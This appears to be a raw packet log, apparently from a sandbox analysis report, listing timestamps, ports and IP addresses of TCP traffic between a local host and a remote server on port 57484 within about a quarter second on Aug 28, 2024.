                                                            Aug 28, 2024 14:01:57.224872112 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.224903107 CEST5748449739172.111.137.132192.168.2.4
Aug 28, 2024 14:01:57.224915028 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.224956989 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.225114107 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.225123882 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.225135088 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.225145102 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.225188971 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.225652933 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.225663900 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.225676060 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.225691080 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.225713015 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.225717068 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.225728035 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.225739956 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.225752115 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.225766897 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.225773096 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.225781918 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.226572990 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.226608992 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.226682901 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.226694107 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.226706028 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.226717949 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.226723909 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.226730108 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.226742029 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.226747036 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.226756096 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.226773024 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.227497101 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.227531910 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.227554083 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.227565050 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.227596998 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.227621078 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.227632046 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.227643967 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.227654934 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.227660894 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.227667093 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.227685928 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.228440046 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.228476048 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.228537083 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.309636116 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.309664011 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.309681892 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.309684992 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.309694052 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.309705973 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.309716940 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.309719086 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.309729099 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.309746027 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.309750080 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.309784889 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.309784889 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.309802055 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.309813023 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.309833050 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.309844971 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.330439091 CEST  57484  49740  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.330490112 CEST  49740  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.330703974 CEST  49740  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.335624933 CEST  57484  49740  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348036051 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348056078 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348067999 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348088980 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348093987 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.348100901 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348113060 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348131895 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.348141909 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.348591089 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348608017 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348625898 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348635912 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348647118 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.348648071 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348659992 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348678112 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.348710060 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.348718882 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348736048 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348747015 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348764896 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.348817110 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348826885 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348836899 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.348850965 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.348880053 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.349003077 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349014044 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349025965 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349066973 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.349117994 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349127054 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349139929 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349150896 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.349181890 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.349201918 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349210978 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349242926 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349260092 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.349297047 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349306107 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349328995 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.349379063 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349390030 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349411964 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349414110 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.349421978 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349437952 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.349509001 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349518061 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349529028 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349539042 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.349548101 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.349572897 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.350253105 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.350264072 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.350277901 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.350292921 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.350306034 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.350349903 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.350361109 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.350373030 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.350384951 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.350399017 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.350423098 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.350446939 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.350457907 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.350492954 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.352142096 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352211952 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352264881 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.352412939 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352454901 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352466106 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352488995 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.352509975 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352519989 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352533102 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352544069 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.352562904 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352566004 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.352574110 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352607012 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.352688074 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352698088 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352710962 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352725983 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352730036 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.352737904 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352754116 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352758884 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.352766037 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352787018 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.352850914 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352861881 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352874041 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.352881908 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.352915049 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.353038073 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.353048086 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.353060007 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.353090048 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.353111982 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.353137970 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.353144884 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.353149891 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.353151083 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.353183985 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.353190899 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.353203058 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.353214979 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.353228092 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.353247881 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.353534937 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.353554964 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.353565931 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.353589058 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.353615999 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.353626966 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.353637934 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.353651047 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.353655100 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.353667974 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.353672981 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.353705883 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.354332924 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.354428053 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.354444027 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.354456902 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.354475975 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.354485989 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.354491949 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.354491949 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.354527950 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.354536057 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.354607105 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.354618073 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.354638100 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.354681969 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.354693890 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.354717016 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.354876995 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.354887962 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.354903936 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.354916096 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.354917049 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.354927063 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.354932070 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.354939938 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.354954958 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.354974031 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.355000973 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.355166912 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.355178118 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.355190039 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.355206966 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.355209112 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.355217934 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.355236053 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.355247021 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.355247021 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.355257988 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.355269909 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.355304956 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.397928953 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.397974968 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.397985935 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.398005962 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.398016930 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.398027897 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.398044109 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.398056984 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.398068905 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.398068905 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.398071051 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.398107052 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.398168087 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.398180008 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.398191929 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.398204088 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.398205996 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.398216009 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.398228884 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.398235083 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.398241043 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.398252964 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.398261070 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.398277998 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.436444044 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.436456919 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.436475992 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.436496973 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.436510086 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.436521053 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.436526060 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.436532021 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.436553001 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.436588049 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.437068939 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.437082052 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.437103987 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.437108040 CEST  49739  57484  192.168.2.4  172.111.137.132
Aug 28, 2024 14:01:57.437114954 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.437144041 CEST  57484  49739  172.111.137.132  192.168.2.4
Aug 28, 2024 14:01:57.437149048 CEST  49739  57484  192.168.2.4  172.111.137.132
                                                            Aug 28, 2024 14:01:57.437156916 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.437169075 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.437177896 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.437210083 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.437386036 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.437397957 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.437416077 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.437427044 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.437447071 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.437470913 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.475358009 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.475373030 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.475394011 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.475405931 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.475420952 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.475435019 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.475440025 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.475476980 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.475508928 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.475522995 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.475538015 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.475553036 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.475564957 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.475584030 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.475909948 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.475922108 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.475936890 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.475955963 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.475976944 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.475987911 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.476011992 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.476782084 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.476794004 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.476814032 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.476850033 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.476865053 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.476901054 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.476921082 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.476932049 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.476944923 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.476953030 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.476958036 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.476977110 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.476978064 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.476989985 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477009058 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477010012 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.477020979 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477051020 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.477387905 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477399111 CEST5748449739172.111.137.132192.168.2.4
